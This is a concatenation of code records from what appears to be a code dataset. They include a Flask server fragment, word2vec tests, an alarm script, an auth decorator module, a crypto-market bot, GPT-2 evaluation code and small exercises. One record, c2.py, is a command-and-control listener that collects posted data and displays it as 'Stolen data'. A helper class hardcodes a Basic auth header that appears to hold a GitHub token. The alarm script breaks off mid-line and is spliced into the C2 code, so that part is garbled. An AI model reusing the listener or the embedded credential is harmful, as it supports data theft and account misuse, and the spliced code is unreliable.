\"https://ondeeubaixo.net/greys-anatomy-a-anatomia-de-grey-10-temporada-completa-torrent\", \"\")\n\n \nif __name__ == \"__main__\":\n 
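    # 0.0.0.0 binds every interface: handy on a LAN, but this is Flask's dev server, not production-grade\n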
socketio.run(app, debug=False, host='0.0.0.0', port=5000)\n\n\n\n","sub_path":"Buscar/buscar_mysql.py","file_name":"buscar_mysql.py","file_ext":"py","file_size_in_byte":24634,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"7609707","text":"import sys\nimport tweepy\nimport json\nimport subprocess\nimport datetime\nimport MeCab\nimport os\nimport warnings\nwarnings.filterwarnings(action='ignore', category=UserWarning, module='gensim')\nfrom gensim.models import word2vec\nbase = 'C:/01.work/01.python/998.data/888.TwoSigma'\nos.chdir(base)\n# data = word2vec.Text8Corpus('aa.txt')\ndata=[['CRU', 'CN', 'RTRS', 'ENR', 'LEN', 'EMRG', 'NGS', 'ASIA'],\n['BD', 'INS', 'LATAM', 'CA', 'US', 'MX', 'IL', 'LIF', 'RTRS', 'FEA', 'LEN', 'MEAST', 'CO', 'ASIA', 'HT'],\n['IQ', 'RO', 'US', 'ID', 'RET', 'RTRS', 'ENR', 'PRESS', 'BG', 'LEN', 'TH', 'NGS', 'BY'],\n['PUB', 'BUS', 'INS', 'CA', 'ENT', 'US', 'FIN', 'SFWR', 'RTRS', 'WWW', 'PRESS', 'USC', 'LEI', 'FUND', 'LEN'],\n['PUB', 'BUS', 'INS', 'CA', 'ENT', 'US', 'FIN', 'SFWR', 'RTRS', 'WWW', 'PRESS', 'USC', 'LEI', 'FUND', 'LEN'],\n['PUB', 'BUS', 'INS', 'CA', 'ENT', 'US', 'FIN', 'SFWR', 'RTRS', 'WWW', 'PRESS', 'USC', 'LEI', 'FUND', 'LEN'],\n['PUB', 'BUS', 'INS', 'CA', 'ENT', 'US', 'FIN', 'SFWR', 'RTRS', 'WWW', 'PRESS', 'USC', 'LEI', 'FUND', 'LEN'],\n['PUB', 'BUS', 'INS', 'CA', 'ENT', 'US', 'FIN', 'SFWR', 'RTRS', 'WWW', 'PRESS', 'USC', 'LEI', 'FUND', 'LEN'],\n['PUB', 'BUS', 'INS', 'CA', 'ENT', 'US', 'FIN', 'SFWR', 'RTRS', 'WWW', 'PRESS', 'USC', 'LEI', 'FUND', 'LEN'],\n['US', 'NEWR', 'LEN', 'DRU'],\n['JOB', 'US', 'NEWS', 'DRV', 'MUNI', 'STX', 'FIN', 'IND', 'GB', 'BNK', 'ENR', 'AU', 'LEN', 'RTRS', 'MCE', 'RESF', 'AUT'],\n['JOB', 'US', 'NEWS', 'DRV', 'MUNI', 'STX', 'FIN', 'IND', 'GB', 'BNK', 'ENR', 'AU', 'LEN', 'RTRS', 'MCE', 'RESF', 'AUT'],\n['JOB', 'US', 'NEWS', 'DRV', 'MUNI', 'STX', 'FIN', 'IND', 'GB', 'BNK', 'ENR', 'AU', 'LEN', 'RTRS', 'MCE', 'RESF', 'AUT'],\n['BD', 'INS', 'LATAM', 'CA', 'US', 'MX', 'IL', 'LIF', 'RTRS', 'FEA', 'LEN', 'MEAST', 'CO', 'ASIA', 'HT'],\n['BACT', 'US', 'NEWR', 'DRU', 'LEN'],\n['BACT', 'BUS', 'US', 'DPR', 'TEL', 'NEWR', 'LEN', 'WWW'],\n['HDWR', 'US', 'REGS', 'TEL', 'APL', 'ELC', 'RTRS', 'LEN', 'EMRG', 'KR', 'ASIA'],\n['HDWR', 'US', 'REGS', 'TEL', 'APL', 'ELC', 'RTRS', 'LEN', 'EMRG', 'KR', 'ASIA'],\n['DE', 'JOB', 'WEU', 'TEL', 'ELC', 'TW', 'RTRS', 'LEN', 'EUROPE', 'ASIA', 'BKRT'],\n['BACT', 'PUB', 'REC', 'DPR', 'TEL', 'NEWR', 'IL', 'MRG', 'TBCS', 'WWW', 'LEN', 'LEI', 'EMRG', 'MEAST'],\n['US', 'TEL', 'IL', 'MRG', 'RTRS', 'LEN', 'EMRG', 'MEAST'],\n['FR', 'WEU', 'MRG', 'BNK', 'RTRS', 'LEN', 'EUROPE'],\n['FR', 'WEU', 'MRG', 'BNK', 'RTRS', 'LEN', 'EUROPE'],\n['FR', 'WEU', 'MRG', 'BNK', 'RTRS', 'LEN', 'EUROPE'],\n['BD', 'INS', 'LATAM', 'CA', 'US', 'MX', 'IL', 'LIF', 'RTRS', 'FEA', 'LEN', 'MEAST', 'CO', 'ASIA', 'HT'],\n['PUB', 'JP', 'CA', 'ENT', 'US', 'FILM', 'LIF', 'RTRS', 'LEN', 'LEI'],\n['PUB', 'JP', 'CA', 'ENT', 'US', 'FILM', 'LIF', 'RTRS', 'LEN', 'LEI'],\n['PUB', 'JP', 'CA', 'ENT', 'US', 'FILM', 'LIF', 'RTRS', 'LEN', 'LEI'],\n['PUB', 'JP', 'CA', 'ENT', 'US', 'FILM', 'LIF', 'RTRS', 'LEN', 'LEI'],\n['PUB', 'JP', 'CA', 'ENT', 'US', 'FILM', 'LIF', 'RTRS', 'LEN', 'LEI'],\n['AU', 'RTRS', 'PRESS', 'LEN', 'ASIA'],\n['AU', 'RTRS', 'PRESS', 'LEN', 'ASIA'],\n['AU', 'RTRS', 'PRESS', 'LEN', 'ASIA'],\n['WEU', 'MRG', 'GB', 'AU', 'RTRS', 'MY', 'LEN', 'EMRG', 'EUROPE', 'ASIA', 'AIR'],\n['LATAM', 'MX', 'BEV', 'RTRS', 'LEN', 'EMRG'],\n['FR', 'ID', 'WEU', 'IN', 'DRU', 'RTRS', 'LEN', 'EMRG', 'TH', 
'EUROPE'],\n['STX', 'TW', 'RTRS', 'LEN', 'EMRG', 'ASIA'],\n['STX', 'TW', 'RTRS', 'LEN', 'EMRG', 'ASIA'],\n['GB', 'RTRS', 'PRESS', 'LEN'],\n['JP', 'STL', 'CRU', 'TEL', 'HK', 'IN', 'CN', 'RTRS', 'ENR', 'PRESS', 'LEN', 'ASIA', 'AUT'],\n['ID', 'TEL', 'RTRS', 'ENR', 'LEN', 'EMRG', 'FUND', 'ASIA'],\n['STX', 'TW', 'RTRS', 'LEN', 'EMRG', 'HOT', 'ASIA'],\n['RET', 'ELG', 'DIV', 'RTRS', 'ENR', 'LEN', 'EMRG', 'KR', 'HOT', 'ASIA', 'AUT'],\n['XREF', 'RET', 'ELG', 'DIV', 'RTRS', 'ENR', 'LEN', 'EMRG', 'KR', 'HOT', 'ASIA', 'AUT'],\n['GB', 'RTRS', 'PRESS', 'LEN'],\n['GB', 'RTRS', 'PRESS', 'LEN'],\n['GB', 'RTRS', 'PRESS', 'LEN'],\n['CHE', 'MAC', 'DRV', 'WEU', 'ELG', 'STX', 'SHP', 'ELC', 'RTRS', 'LEN', 'EMRG', 'CON', 'KR', 'EUROPE', 'ASIA', 'AUT'],\n['CHE', 'MAC', 'DRV', 'WEU', 'ELG', 'STX', 'SHP', 'ELC', 'RTRS', 'LEN', 'EMRG', 'CON', 'KR', 'EUROPE', 'XREF', 'ASIA', 'AUT'],\n['CHE', 'MAC', 'DRV', 'WEU', 'ELG', 'STX', 'SHP', 'ELC', 'RTRS', 'LEN', 'EMRG', 'CON', 'KR', 'EUROPE', 'XREF', 'ASIA', 'AUT'],\n['CHE', 'MAC', 'DRV', 'WEU', 'ELG', 'STX', 'SHP', 'ELC', 'RTRS', 'LEN', 'EMRG', 'CON', 'KR', 'EUROPE', 'XREF', 'ASIA', 'AUT'],\n['ID', 'NEWS', 'MRG', 'GB', 'AU', 'RTRS', 'MY', 'LEN', 'EMRG', 'TH', 'ASIA'],\n['JP', 'ELI', 'HDWR', 'TEL', 'US', 'CN', 'ELC', 'TW', 'RTRS', 'SG', 'LEN', 'EMRG', 'KR', 'ASIA'],\n['RET', 'ELG', 'FIN', 'DIV', 'BNK', 'ENR', 'LEN', 'RTRS', 'EMRG', 'KR', 'HOT', 'ASIA', 'AUT'],\n['RET', 'ELG', 'FIN', 'DIV', 'BNK', 'ENR', 'LEN', 'RTRS', 'EMRG', 'KR', 'HOT', 'ASIA', 'AUT'],\n['RET', 'ELG', 'FIN', 'DIV', 'BNK', 'ENR', 'LEN', 'RTRS', 'EMRG', 'KR', 'HOT', 'ASIA', 'AUT'],\n['JP', 'MAC', 'IN', 'RTRS', 'LEN', 'EMRG', 'ASIA', 'RESF', 'AUT'],\n['JP', 'MAC', 'IN', 'RTRS', 'LEN', 'EMRG', 'ASIA', 'RESF', 'AUT'],\n['XREF', 'RET', 'ELG', 'FIN', 'DIV', 'BNK', 'ENR', 'LEN', 'RTRS', 'EMRG', 'KR', 'HOT', 'ASIA', 'AUT'],\n['XREF', 'RET', 'ELG', 'FIN', 'DIV', 'BNK', 'ENR', 'LEN', 'RTRS', 'EMRG', 'KR', 'HOT', 'ASIA', 'AUT'],\n['XREF', 'RET', 'ELG', 'FIN', 'DIV', 'BNK', 'ENR', 'LEN', 'RTRS', 'EMRG', 'KR', 'HOT', 'ASIA', 'AUT'],\n['XREF', 'RET', 'ELG', 'FIN', 'DIV', 'BNK', 'ENR', 'LEN', 'RTRS', 'EMRG', 'KR', 'HOT', 'ASIA', 'AUT'],\n['ENT', 'HDWR', 'DPR', 'US', 'STX', 'SFWR', 'REA', 'RTRS', 'PRESS', 'LEN', 'BY', 'WASH'],\n['JP', 'ELI', 'HDWR', 'TEL', 'US', 'CN', 'ELC', 'TW', 'RTRS', 'SG', 'LEN', 'EMRG', 'KR', 'ASIA'],\n['ECI', 'CEN', 'REA', 'RTRS', 'LEN', 'EMRG', 'CON', 'KR', 'MCE', 'ASIA', 'STIR'],\n['BACT', 'BUS', 'US', 'NEWR', 'MNGISS', 'LEN'],\n['MUL', 'TEL', 'STX', 'HK', 'FIN', 'SHP', 'CN', 'GB', 'BNK', 'RTRS', 'LEN', 'ASIA'],\n['MUL', 'TEL', 'STX', 'HK', 'FIN', 'SHP', 'CN', 'GB', 'BNK', 'RTRS', 'LEN', 'ASIA'],\n['MUL', 'TEL', 'STX', 'HK', 'FIN', 'SHP', 'CN', 'GB', 'BNK', 'RTRS', 'LEN', 'ASIA'],\n['MUL', 'TEL', 'STX', 'HK', 'FIN', 'SHP', 'CN', 'GB', 'BNK', 'RTRS', 'LEN', 'ASIA'],\n['JP', 'HDWR', 'US', 'CN', 'ELC', 'TW', 'RTRS', 'LEN', 'EMRG', 'KR', 'ASIA'],\n['BACT', 'INS', 'US', 'WEU', 'NEWR', 'FIN', 'GB', 'LEN', 'EUROPE', 'EU'],\n['FR', 'WEU', 'RTRS', 'LEN', 'EUROPE'],\n['INT', 'LOA', 'CEN', 'PLCY', 'BLD', 'REA', 'RTRS', 'LEN', 'EMRG', 'CON', 'KR', 'MCE', 'ASIA', 'STIR'],\n['IT', 'WEU', 'STX', 'RTRS', 'LEN', 'EUROPE'],\n['IT', 'WEU', 'STX', 'RTRS', 'LEN', 'EUROPE'],\n['DE', 'US', 'CN', 'TRD', 'RTRS', 'LEN', 'EMRG', 'ASIA', 'AUT'],\n['JP', 'STL', 'FR', 'US', 'WEU', 'MRG', 'RTRS', 'LEN', 'EUROPE', 'MET', 'WHO'],\n['NL', 'WEU', 'STX', 'RTRS', 'LEN', 'BE', 'EUROPE', 'XREF'],\n['NL', 'WEU', 'STX', 'RTRS', 'LEN', 'BE', 'EUROPE', 'XREF'],\n['NL', 'WEU', 'STX', 'RTRS', 'LEN', 'BE', 'EUROPE', 'XREF'],\n['NL', 'WEU', 
'STX', 'RTRS', 'LEN', 'BE', 'EUROPE', 'XREF'],\n['CHE', 'MAC', 'DRV', 'WEU', 'ELG', 'STX', 'SHP', 'ELC', 'RTRS', 'LEN', 'EMRG', 'CON', 'KR', 'ASIA', 'AUT'],\n['WEU', 'STX', 'RTRS', 'LEN', 'EUROPE', 'FI', 'NORD'],\n['WEU', 'STX', 'RTRS', 'LEN', 'EUROPE', 'FI', 'NORD'],\n['WEU', 'STX', 'RTRS', 'LEN', 'EUROPE', 'FI', 'NORD'],\n['CHE', 'MAC', 'DRV', 'WEU', 'ELG', 'STX', 'SHP', 'ELC', 'RTRS', 'LEN', 'EMRG', 'CON', 'KR', 'ASIA', 'AUT'],\n['CHE', 'MAC', 'DRV', 'WEU', 'ELG', 'STX', 'SHP', 'ELC', 'RTRS', 'LEN', 'EMRG', 'CON', 'KR', 'ASIA', 'AUT'],\n['PT', 'DE', 'NL', 'FR', 'CH', 'NEWS', 'WEU', 'IT', 'STX', 'GB', 'RTRS', 'LEN', 'ES', 'EUROPE', 'NORD'],\n['PT', 'DE', 'NL', 'FR', 'CH', 'NEWS', 'WEU', 'IT', 'STX', 'GB', 'RTRS', 'LEN', 'ES', 'EUROPE', 'NORD'],\n['PT', 'DE', 'NL', 'FR', 'CH', 'NEWS', 'WEU', 'IT', 'STX', 'GB', 'RTRS', 'LEN', 'ES', 'EUROPE', 'XREF', 'NORD'],\n['PT', 'DE', 'NL', 'FR', 'CH', 'NEWS', 'WEU', 'IT', 'STX', 'GB', 'RTRS', 'LEN', 'ES', 'EUROPE', 'XREF', 'NORD'],\n['IT', 'WEU', 'STX', 'RTRS', 'LEN', 'EUROPE'],\n['PUB', 'DE', 'LATAM', 'REC', 'TEL', 'NEWR', 'WEU', 'IN', 'CN', 'TBCS', 'BR', 'WWW', 'LEN', 'EMRG', 'LEI', 'EUROPE', 'ASIA'],\n['WEU', 'GB', 'IE', 'LEN', 'EUROPE', 'REG'],\n['WEU', 'GB', 'IE', 'LEN', 'EUROPE', 'REG'],\n['WEU', 'ELG', 'GB', 'LEN', 'EUROPE', 'REG'],\n['WEU', 'ELG', 'GB', 'LEN', 'EUROPE', 'REG'],\n['WEU', 'MRG', 'GB', 'LEN', 'EUROPE', 'REG'],\n['WEU', 'FIN', 'GB', 'LEN', 'EUROPE', 'REG']]\n\ndef test1():\n model = word2vec.Word2Vec(data, size=5,window=2,min_count=1)\n k=model.most_similar(positive=u'EMRG')\n\n # print(\"rest:\",k)\n print(model.wv['WEU', 'MRG', 'GB', 'LEN', 'EUROPE', 'REG'])\n print(model.wv['WEU'])\ndef train(data):\n model = word2vec.Word2Vec(size=5,min_count=1)\n model.build_vocab(data)\n model.train(data, total_examples=len(data),epochs=200)\n model.save(\"word2vec/word2vec.model\")\n # print(model.wv['WEU'])\n# print(len(data))\ndef predict(str):\n model = word2vec.Word2Vec.load(\"word2vec/word2vec.model\")\n print(model.wv[str])\n# train(data)\npredict('WEU')","sub_path":"000.TwoSigma/test/word2vec_test.py","file_name":"word2vec_test.py","file_ext":"py","file_size_in_byte":8739,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"368131718","text":"import datefinder\nimport winsound\nimport datetime\n\ndef alarm(text):\n\tDate_Time_Alarm=datefinder.find_dates(text)\n\tfor match in Date_Time_Alarm:\n\t\tprint(match)\n\tStringAlarm=str(match)\n\tTimeAlarm=StringAlarm[11:]\n\tprint(TimeAlarm)\n\tHourAlarm=int(TimeAlarm[:-6])\n\tMinAlarm=int(TimeAlarm[3:-3])\n\n\twhile True:\n\t\tif HourAlarm==datetime.datetime.now().hour:\n\t\t\tif MinAlarm==datetime.datetime.now().minute:\n\t\t\t\tprint(\"Alarm is running\")\n\t\t\t\twinsound.PlaySound(\"C:\\\\Users\\\\ruhel\\\\Downloads\\\\Never Gonna Give You Up Original.mp3\",winsound.SND_LOOP)\n\t\t\telif MinAlarm\" + str(request.data)\n return jsonify(success=True)\n\n@app.route(\"/\", methods=[\"GET\"])\ndef index():\n global data\n return \"
Stolen data:
\" + data\n\nif __name__ == '__main__':\n app.run()\n\n","sub_path":"c2.py","file_name":"c2.py","file_ext":"py","file_size_in_byte":375,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"454797153","text":"from functools import wraps\nfrom inspect import signature\nimport datetime\nimport logging\n\nfrom flask import g, session\nfrom research_auth.flask_ext import FlaskOpenIdClient\n\nimport markerfarmapi.config as cfg\nfrom markerfarmapi import database_utility as db_util\nfrom markerfarmapi.models.UserRole import UserRole\nfrom markerfarmapi.utility import create_json_response\nfrom markerfarmapi.markerfarm.external import azuread_service, oidc_service\n\nSUCCESS = 'Success'\nERROR = 'Error'\n\nlogger = logging.getLogger(__name__)\nlogger.setLevel(logging.INFO)\n\n\ndef authorize(*roles, require_identity=False):\n def wrapper(f):\n @wraps(f)\n def wrapped(*args, **kwargs):\n username = None\n user_role = None\n oid = None\n\n user_session = session.get('user')\n if user_session:\n username = user_session['username']\n user_role = user_session['role']\n oid = user_session['oid']\n else:\n access_token = oidc_service.get_access_token_from_request()\n if access_token:\n client_id = cfg.research_auth['client_id']\n jwt_data = oidc_service.get_jwt_token_claims(access_token, audience=client_id)\n logger.debug(\"jwt_claims: %s\", jwt_data.claims)\n if jwt_data.exception or not jwt_data.valid:\n return create_json_response(\"Error\", f'Access denied: access token invalid: {jwt_data.exception}', 401)\n\n oid = jwt_data.claims.get(\"oid\")\n if not oid:\n return create_json_response(\"Error\", \"Access denied: access token does not contain 'oid' field\", 401)\n\n try:\n user = get_user_by_oid(oid)\n if user:\n username = user.user_name\n user_role = user.role.value\n else:\n username = azuread_service.get_username_for_current_user(access_token)\n user = get_user_by_username(username)\n if user:\n user_role = user.role.value\n user.oid = oid\n db_util.db_commit()\n\n except Exception as e:\n logger.warn(\"Could not establish username or role: %s\", e)\n\n if(all([username, user_role, oid])):\n session['user'] = dict(\n username=username,\n role=user_role,\n oid=oid\n )\n\n if not (oid):\n return create_json_response(\"Error\", 'Access denied: no valid credentials given', 401)\n if not username:\n return create_json_response(\"Error\", f\"Access denied: Could not establish identity for '{oid}'\", 403)\n if user_role not in roles:\n return create_json_response(\"Error\", f\"Access denied: Caller identity '{username}' is not authorized to call this endpoint\", 403)\n\n g.user = dict(username=username, user_role=user_role, oid=oid)\n if \"username\" in signature(f).parameters:\n kwargs['username'] = username\n if \"user_role\" in signature(f).parameters:\n kwargs['user_role'] = user_role\n\n return f(*args, **kwargs)\n\n return wrapped\n\n return wrapper\n\ndef get_user_by_oid(oid):\n try:\n user = UserRole.query.filter(UserRole.oid==oid).one_or_none()\n return user\n except Exception as e:\n logger.error(\"Could not get user by oid: %s\", e)\n raise\n\ndef get_user_by_username(user_name):\n \"\"\"\n Gets SnpFinder user\n \"\"\"\n try:\n user = UserRole.query.get(user_name)\n except Exception as e:\n raise Exception('Failed to get user with error: ', e)\n\n return user if user else None\n\ndef get_current_user_email():\n access_token = oidc_service.get_access_token_from_request()\n profile = azuread_service.get_user_profile(access_token)\n return 
profile.get('mail')\n\ndef add_user(userdata):\n \"\"\"\n Adds new user for SnpFinder Application\n \"\"\"\n try:\n result = {}\n user_name = userdata['username']\n role = userdata.get('role', '').lower()\n oid = userdata.get('oid')\n if role == \"user\":\n active = is_active(userdata['active'])\n user_role = UserRole(user_name, role, active, oid)\n db_util.db.session.add(user_role)\n db_util.db.session.commit()\n result['status'] = 'Success: user-data inserted successfully!'\n else:\n result['status'] = 'Error: Invalid role provided'\n\n except Exception as e:\n err_type = e.__class__.__name__\n if err_type == 'IntegrityError':\n raise Exception('Failed to add user as it is already authorized with error: ', e)\n\n raise Exception('Failed to add user with error: ', e)\n\n return result\n\n\ndef set_user_status(usr_name, userdata):\n \"\"\"\n Toggles user status between 'y' and 'n'\n \"\"\"\n try:\n result = {}\n user = UserRole.query.get(usr_name)\n if not user:\n raise Exception(\"user \" + usr_name + \" does not exist\")\n if 'active' in userdata and userdata['active']:\n active_value = is_active(userdata['active'])\n user.active = active_value\n if active_value:\n result['status'] = 'User ' + usr_name + ' is activated'\n else:\n result['status'] = 'User ' + usr_name + ' is deactivated'\n # updating user role\n user.role = userdata.get('role', user.role)\n db_util.db_commit()\n result['role'] = user.role\n\n except Exception as e:\n raise Exception('Failed to set user status with error: ', e)\n\n return result\n\n\ndef set_user_role(usr_name, userdata):\n \"\"\"\n Set user role\n \"\"\"\n try:\n result = {}\n role = None\n user = UserRole.query.get(usr_name)\n if not user:\n raise Exception(\"user \" + usr_name + \" does not exist\")\n if 'role' in userdata and userdata['role']:\n user.role = userdata.get('role', user.role)\n role = user.role\n\n db_util.db_commit()\n result['username'] = usr_name\n result['role'] = role\n\n except Exception as e:\n raise Exception('Failed to set user role with error: ', e)\n\n return result\n\n\ndef is_active(active):\n active_values = ['y', 'yes', 'true']\n if active.lower() in active_values:\n return True\n else:\n return False\n","sub_path":"markerfarmapi/markerfarm/user_service.py","file_name":"user_service.py","file_ext":"py","file_size_in_byte":6758,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"519720561","text":"import time, requests\nfrom classes import donchian\nfrom prettytable import PrettyTable\n\nTICK_INTERVAL = 300 # seconds\n\n\ndef main():\n print('Starting bot...')\n\n while True:\n start = time.time()\n tick()\n end = time.time()\n\n if end - start < TICK_INTERVAL:\n time.sleep(TICK_INTERVAL - (end - start))\n\n\ndef tick():\n print('Running routine')\n ticktable = PrettyTable()\n ticktable.clear()\n ticktable.field_names = ['-----', \"5 minutes\", \"30 minutes\", \"Hour\"]\n market_summaries = simple_request('https://bittrex.com/api/v1.1/public/getmarketsummaries')\n string = 'BTC'\n for summary in market_summaries['result']:\n if string in summary['MarketName'] and summary['BaseVolume'] >= 80:\n market = summary['MarketName']\n try:\n agent5m = donchian.Donchian(market, 'fiveMin')\n agent30m = donchian.Donchian(market, 'thirtyMin')\n agent1h = donchian.Donchian(market, 'hour')\n longmaterial5m = agent5m.is_long_material()\n longmaterial30m = agent30m.is_long_material()\n longmaterial1h = agent1h.is_long_material()\n position5m = agent5m.define_position(agent5m.trim_data(1))\n 
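                # trim_data(1) appears to keep only the newest candle, so each position check runs on the latest close (the Donchian API itself is not shown here)\n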
position30m = agent30m.define_position(agent30m.trim_data(1))\n position1h = agent1h.define_position(agent1h.trim_data(1))\n limarketsep = [market, '****', '****', '****']\n liposition = ['Price Position', position5m, position30m, position1h]\n limaterial = ['Long Material', longmaterial5m, longmaterial30m, longmaterial1h]\n ticktable.add_row(limarketsep)\n ticktable.add_row(liposition)\n ticktable.add_row(limaterial)\n print(market + ' has been processed')\n except TypeError:\n print('TypeError while proccesing market ' + market)\n pass\n print(ticktable)\n print('End of routine, lets sleep')\n\n\ndef simple_request(url):\n r = requests.get(url)\n return r.json()\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"tablegenerators/multimarketmultiinterval.py","file_name":"multimarketmultiinterval.py","file_ext":"py","file_size_in_byte":2139,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"22436496","text":"# -*- coding: utf-8 -*-\n# Copyright 2019 Ross Jacobs All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\"\"\"Utilities that codegen uses.\"\"\"\nimport datetime\nimport distutils.version\nimport http.client\nimport json\nimport logging\nimport re\n\nimport codegen\n\nLOGGER = logging.getLogger(__name__)\n\n\nclass GithubIssues:\n \"\"\"Interface with Github Issues for mad-codegen project.\"\"\"\n def __init__(self):\n self.headers = {\n 'Authorization': 'Basic cG9jYzo5Nzg5ODkwYmU4YThiYzZiZDc4'\n 'MDcwMmY4NGEwNmZlNzExZGJjY2Yw',\n 'User-Agent': 'Merakygen'\n }\n\n def get_issues(self):\n \"\"\"Get the issues for this project.\"\"\"\n conn = http.client.HTTPSConnection('api.github.com')\n conn.request('GET', '/repos/pocc/mad-codegen/issues',\n headers=self.headers)\n resp = conn.getresponse()\n issues_text = resp.read().decode('utf-8')\n\n return issues_text\n\n def check_issue(self, api_primitive):\n \"\"\"Check whether a new API primitive has an issue assigned.\n\n Args:\n api_primitive (str): A Meraki API path parameter\n Returns (bool):\n Whether there is a new path parameter that requires an issue\n \"\"\"\n issues_json = json.loads(self.get_issues())\n existing_issue_titles = [issue['title'] for issue in issues_json]\n new_issue_required = api_primitive not in existing_issue_titles \\\n and self.is_up_to_date()\n if new_issue_required:\n print(\"INFO: API primitive not found. 
\"\n \"This means new API endpoints have been released.\"\n \"\\nPlease create an issue:\"\n \"\\n\\n\\thttps://github.com/pocc/mad-codegen/issues\"\n \"\\n\\tTitle\\tNew API primitive found: `\" + api_primitive + \"`\"\n \"\\n\\tBody\\tFound at \" + str(datetime.datetime.utcnow()))\n\n return new_issue_required\n\n def is_up_to_date(self):\n \"\"\"Check whether this program is out of date with github's.\n\n Returns (bool):\n Whether this program is out of date with masters' version.\n \"\"\"\n base_url = 'raw.githubusercontent.com'\n route = '/pocc/mad-codegen/master/mad-codegen/__init__.py'\n conn = http.client.HTTPSConnection(base_url)\n conn.request('GET', route, headers=self.headers)\n resp = conn.getresponse()\n init_text = resp.read().decode('utf-8')\n web_version = re.search(r'__version__ ?= ?\\'([0-9.]*)\\'', init_text)[1]\n\n up_to_date = distutils.version.StrictVersion(codegen.__version__) \\\n >= distutils.version.StrictVersion(web_version)\n\n return up_to_date\n\n\ndef log_ext_program_output(program_name, program_output):\n \"\"\"Other programs return log text via Popen. Format that and log it.\n\n Log it as debug as it is verbose and mostly not relevant to operation.\n\n Args:\n program_output (str): Output of another program\n program_name (str): Name of the program being called\n \"\"\"\n if 'ERROR' in program_output:\n err_line = re.search(r'\\n(.*?ERROR.*?)\\n', program_output).group(1)\n raise RuntimeError(program_name + ' produced error: ' + str(err_line))\n\n output_line_start = '\\n\\t> [' + program_name + '] > '\n program_output = program_output.replace('\\n\\n', '\\n')\n formatted_text = re.sub(r'\\n([\\S ])', output_line_start + '\\\\1',\n program_output)\n LOGGER.debug('`' + program_name + '` STDOUT >' +\n output_line_start + formatted_text)\n","sub_path":"codegen/_utils.py","file_name":"_utils.py","file_ext":"py","file_size_in_byte":4088,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"263435375","text":"#!/usr/bin/env python\n# coding=utf-8\n# Copyright 2020 The HuggingFace Inc. team. 
All rights reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport argparse\n\nimport torch\nfrom tqdm import tqdm\nfrom datasets import load_dataset\nfrom transformers import GPT2LMHeadModel, GPT2TokenizerFast\n\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--model_name_or_path', type=str, default='gpt2',\n help='The model checkpoint for weights initialization.')\n\ndef main():\n args = parser.parse_args()\n \n device = 'cuda'\n model_id = args.model_name_or_path\n\n model = GPT2LMHeadModel.from_pretrained(model_id).to(device)\n tokenizer = GPT2TokenizerFast.from_pretrained(model_id)\n\n dataset = load_dataset('ptb_text_only')\n texts = [el['sentence'] for el in dataset['test']]\n encodings = tokenizer('\\n\\n'.join(texts), return_tensors='pt')\n\n max_length = model.config.n_positions\n stride = 1024\n\n lls = []\n for i in tqdm(range(0, encodings.input_ids.size(1), stride)):\n begin_loc = max(i + stride - max_length, 0)\n end_loc = min(i + stride, encodings.input_ids.size(1))\n trg_len = end_loc - i # may be different from stride on last loop\n input_ids = encodings.input_ids[:,begin_loc:end_loc].to(device)\n target_ids = input_ids.clone()\n target_ids[:,:-trg_len] = -100\n\n with torch.no_grad():\n outputs = model(input_ids, labels=target_ids)\n log_likelihood = outputs[0] * trg_len\n\n lls.append(log_likelihood)\n\n ppl = torch.exp(torch.stack(lls).sum() / end_loc)\n\n print(\"Perplexity:\", ppl)\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"eval_gpt2.py","file_name":"eval_gpt2.py","file_ext":"py","file_size_in_byte":2147,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"35225050","text":"#!/usr/bin/env python3\n\nimport unittest\nfrom closest_pair import closest_pair, brute_force_closest_pair\n\nclass TestClosestPair(unittest.TestCase):\n def test_brute_force_closest_pair(self):\n closest_pairs = [(1, 1), (1, 2)]\n points = closest_pairs + [(3, 0), (4, 9)]\n result = brute_force_closest_pair(points)\n self.assertEqual(result, tuple(closest_pairs))\n\n def test_closest_pair(self):\n closest_pairs = [(1, 1), (1, 2)]\n points = closest_pairs + [(3, 0), (4, 9)]\n result = closest_pair(points)\n self.assertEqual(result, tuple(closest_pairs))\n\n\nif __name__ == '__main__':\n unittest.main()","sub_path":"closest_pair/test_closest_pair.py","file_name":"test_closest_pair.py","file_ext":"py","file_size_in_byte":654,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"403475745","text":"def main():\n x = 0\n student_marks = []\n student_names = []\n print(name_message())\n total_grades = int(input(\"How many grades would you like to enter?: \"))\n while x < total_grades:\n student_marks.append(take_interger())\n student_names.append(take_name())\n x += 1\n print(f\"The class average is % {average(student_marks)}\")\n name_list(student_names, student_marks)\n print(failing_grades(student_marks)) \n\n\ndef take_name():\n while True:\n name = 
